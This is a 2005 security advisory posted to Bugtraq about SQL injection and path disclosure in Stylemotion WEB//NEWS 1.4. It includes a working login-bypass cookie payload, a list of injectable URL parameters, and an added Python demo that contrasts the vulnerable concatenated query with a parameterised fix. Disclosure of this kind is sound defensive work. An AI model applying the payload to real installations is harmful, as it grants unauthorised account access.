lists.openwall.net: Open Source and information security mailing list archives
Message-ID: <20050907154952.31448.qmail@securityfocus.com>
Date: 7 Sep 2005 15:49:52 -0000
From: r.verton@...il.com
To: bugtraq@...urityfocus.com
Subject: [NewAngels Advisory #5] Stylemotion WEB//NEWS 1.4 Vulnerabilities


[NewAngels Advisory #5] Stylemotion WEB//NEWS 1.4
=============================================================================

Software: WEB//NEWS 1.4
Type: SQL Injections, Path Disclosure
Risk: High

Date: Sep. 1 2005
Vendor: Stylemotion


Credit:
=======
Robin 'onkel_fisch' Verton
http://www.it-security23.net

Description:
============
WEB//News is a news script with CMS-like features.


Vulnerability:
==============

In modules/startup.php the login cookies are passed straight into the user lookup:

$_USER=$db->first("SELECT * FROM ".PRE."_user LEFT JOIN ".PRE."_group USING (groupid) 
		      WHERE 
			( userid='".$_COOKIE['wn_userid']."' AND password='".$_COOKIE['wn_userpw']."' ) 
		      LIMIT 1");

As the query shows, the $_COOKIE values are neither checked nor escaped before they are concatenated into the SQL string. Note also that the comparison is made directly against the password column, so the wn_userpw cookie has to carry whatever value is stored there. Set the following cookies and send the request to index.php to be logged in without valid credentials:

wn_userid=1; wn_userpw=0' OR '1'='1

The WHERE clause then becomes ( userid='1' AND password='0' OR '1'='1' ). Because AND binds tighter than OR, the condition is true for every row, and LIMIT 1 returns the first user the database yields.
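To make the effect of the cookie payload concrete, here is an added example (not code from the advisory or from Stylemotion) that rebuilds the startup.php query in Python over an in-memory SQLite database: the concatenated query is reproduced as WEB//NEWS builds it, then run beside a parameterised version. The table prefix PRE="wn", the column layout and the two sample rows are assumptions constructed for the demo; the real application runs PHP against MySQL, but the precedence and quoting behaviour that the injection relies on is the same.

```python
import sqlite3

# Table prefix. The advisory refers to a PRE constant; "wn" is an assumption for this demo.
PRE = "wn"


def make_db():
    """Constructed sample database (not from WEB//NEWS): two users, two groups."""
    con = sqlite3.connect(":memory:")
    con.row_factory = sqlite3.Row  # allows row["username"] access below
    con.execute(f"CREATE TABLE {PRE}_group (groupid INTEGER PRIMARY KEY, groupname TEXT)")
    con.execute(
        f"CREATE TABLE {PRE}_user (userid INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, groupid INTEGER)"
    )
    con.executemany(f"INSERT INTO {PRE}_group VALUES (?, ?)", [(1, "admin"), (2, "editor")])
    # The password column holds placeholder strings; the advisory does not say how
    # WEB//NEWS stores passwords, so no particular hash scheme is assumed here.
    con.executemany(
        f"INSERT INTO {PRE}_user VALUES (?, ?, ?, ?)",
        [(1, "admin", "hash-admin-constructed", 1),
         (2, "bob", "hash-bob-constructed", 2)],
    )
    return con


def build_query(cookies):
    """Reproduces the string concatenation from modules/startup.php."""
    return (
        f"SELECT * FROM {PRE}_user LEFT JOIN {PRE}_group USING (groupid) "
        f"WHERE ( userid='{cookies['wn_userid']}' AND password='{cookies['wn_userpw']}' ) "
        "LIMIT 1"
    )


def login_vulnerable(con, cookies):
    """Runs the concatenated query exactly as the vulnerable code does.

    With the advisory's payload the WHERE clause reads
    ( userid='1' AND password='0' OR '1'='1' ), which is true for every row,
    so LIMIT 1 hands back the first user in the table.
    """
    return con.execute(build_query(cookies)).fetchone()


def login_fixed(con, cookies):
    """Hardened variant: bound parameters, so cookie text can never become SQL syntax."""
    sql = (
        f"SELECT * FROM {PRE}_user LEFT JOIN {PRE}_group USING (groupid) "
        "WHERE ( userid=? AND password=? ) LIMIT 1"
    )
    return con.execute(sql, (cookies["wn_userid"], cookies["wn_userpw"])).fetchone()


if __name__ == "__main__":
    con = make_db()
    payload = {"wn_userid": "1", "wn_userpw": "0' OR '1'='1"}
    print(build_query(payload))
    row = login_vulnerable(con, payload)
    print("vulnerable:", row["username"], "in group", row["groupname"])
    print("fixed:", login_fixed(con, payload))
```

The same payload that logs the attacker in as the first user through login_vulnerable() yields no row at all from login_fixed(), because the driver sends the cookie value as data rather than splicing it into the statement; a genuine cookie pair still authenticates through the fixed query.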

Path Disclosure:
No file in the /actions directory checks whether it was included by the application or requested directly. Requesting one on its own, outside the include chain that normally sets up its variables, produces PHP error output that reveals the script's absolute path on the server.
Example:
/actions/cat.add.php?name=A

Nearly every request variable is used without validation, so several further SQL injections are available.

A few Examples:
/include_this/news.php?cat=[SQL]
/include_this/news.php?id=[SQL]
/print.php?id=[SQL]
/include_this/news.php?stof=[SQL]

Greets:
==============
Whole NewAngel Team, CyberDead, Modhacker, deluxe

